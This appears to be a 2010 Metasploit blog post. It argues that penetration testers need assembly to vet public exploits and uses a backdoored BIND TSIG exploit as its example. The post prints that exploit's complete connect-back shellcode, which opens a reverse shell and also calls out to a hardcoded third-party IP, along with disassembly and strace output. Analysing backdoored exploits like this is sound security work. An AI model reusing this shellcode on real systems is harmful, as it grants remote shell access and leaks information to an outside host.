begood Posted April 6, 2010

This afternoon a question came up on the #metasploit IRC channel (irc.freenode.net). The questioner asked: "Should a good penetration tester know assembly?" This led to some discussion about when and where assembly language skills become important in the scope of a penetration test. My normal response to "Should I learn [something]?" questions is always a resounding YES; it is hard to know too much as a penetration tester or system auditor.

Little things, like knowing the common beginner mistakes in configuration files, can go a long way toward a successful penetration test. Assembly helps, just like everything else does, but it's not always required or even used frequently. Assembly language programming is mandatory for developing your own exploits and for tweaking other people's, but for the most part, it is not the defining factor in whether you will gain access to a network.

There is one critical task where deep knowledge of assembly (and C) is required: validating public exploits. Over the years, dozens of fake exploits have been released; some of these delete all of the files from the drive, while others install a persistent backdoor. There is one other class of backdoored exploits that you rarely hear about, but that can still be found on public exploit repositories. These exploits look correct and function correctly, but they also provide the exploit author with access to the system you exploited. The tricky thing about these exploits is that to find the backdoor, you have to decode and understand the shellcode, which is invariably written in assembly language.

Let's go through a real-life example. In 2001, Gustavo Scotti of Tamandua Laboratories (now Axur Information Security) released an exploit for the BIND TSIG buffer overflow vulnerability published by Network Associates (now McAfee). This exploit, named tsl_bind.c, can still be found on a number of exploit repositories, including PacketStorm.
This exploit looks and works as advertised, except for one tiny thing. Let's take a closer look at the Linux shellcode in this exploit:

    /* SHELLCODE - this is a connect back shellcode */
    u8 shellcode[]=
    "\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46"
    "\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89"
    "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
    "\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90"
    "\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59"
    "\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46"
    "\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86"
    "\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06"
    "\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0"
    "\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62"
    "\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46"
    "\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
    "\xcd\x80\x31\xc0\x40\xcd\x80";

Nothing too sinister jumps out at first glance, but let's actually look at the instructions:

    00000000  3C90              cmp al,0x90
    00000002  89E6              mov esi,esp
    00000004  83C640            add esi,byte +0x40
    00000007  C70602000BAC      mov dword [esi],0xac0b0002
    0000000D  C7460497C447A0    mov dword [esi+0x4],0xa047c497
    00000014  31C0              xor eax,eax
    [snip]
    00000058  7432              jz 0x8c
    0000005A  8B0424            mov eax,[esp]
    0000005D  894608            mov [esi+0x8],eax
    00000060  90                nop
    00000061  BD7F000001        mov ebp,0x100007f
    00000066  896E04            mov [esi+0x4],ebp
    00000069  C70603803586      mov dword [esi],0x86358003
    0000006F  B804000000        mov eax,0x4

In the excerpt above (the full listing was linked from the original blog post), we can see that there are actually TWO reverse connections. One goes to 151.196.71.160 (bytes 97 C4 47 A0, which the disassembler prints as the little-endian immediate 0xa047c497). The other goes to 127.0.0.1 (bytes 7F 00 00 01, loaded by mov ebp,0x100007f). The 127.0.0.1 placeholder is replaced with your own address when the exploit is run, but the first address is hardcoded.
In essence, every time this exploit succeeds, it gives you a shell, but it also connects back to the author's IP address and sends a blob of information about the user running the exploit.

If you pipe the shellcode into Metasploit's msfencode, you can see it in action:

    $ msfencode -e generic/none -a x86 -p linux -t elf -o tsl.bin < shellcode.raw
    $ chmod +x ./tsl.bin
    $ strace -f -qix ./tsl.bin
    [ Process PID=15282 runs in 32 bit mode. ]
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
    connect(3, {sa_family=AF_INET, sin_port=htons(2988), sin_addr=inet_addr("151.196.71.160")}, 16
    write(3, "\3\2005\206\177\0\0\1\1\0\0\0", 12) = 12
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
    connect(4, {sa_family=AF_INET, sin_port=htons(2987), sin_addr=inet_addr("127.0.0.1")}, 16) = 4
    dup2(4, 0) = 0
    dup2(4, 1) = 1
    execve("/bin/sh",...)= 0

To add insult to injury, the backdoor IP gets its connection first!

In summary, if you are using exploits from public repositories for your penetration testing engagements, you do need to learn assembly language. Intel x86 is a must, as is any other architecture you happen to test (PowerPC, SPARC, ARM, etc.).

This is another reason to prefer the Metasploit Framework over unvetted public exploits. Every single exploit, encoder, NOP generator, and payload in Metasploit has been reviewed by a member of the core team. Converting public exploits into Metasploit modules has a useful side effect: every one of them goes through a review and analysis process. Public code is first broken down into its transport, vector, return address, and payload components, and each piece is then reimplemented using the Metasploit API. This process leads to reliable exploit code that doesn't depend on a specific payload or transport.

Update: A few folks have asked about getting-started guides for x86 assembly. One resource I find useful is the tutorial section of the Linux Assembly project.
Once you have the basics down, take a look through the shellcode directory of the Metasploit Framework and study up with the NASM Manual.

Update: In addition to the comments below, readers recommended the Programming From the Ground Up book and the ASM Community web site.

Update: Based on comments below from gscotti (the exploit's original author), I clarified the post to indicate that only a reverse connection is made to his address, not an actual shell. His comment states that over 30,000 IPs have connected back since he released it.

hdmoore @ blog.metasploit.com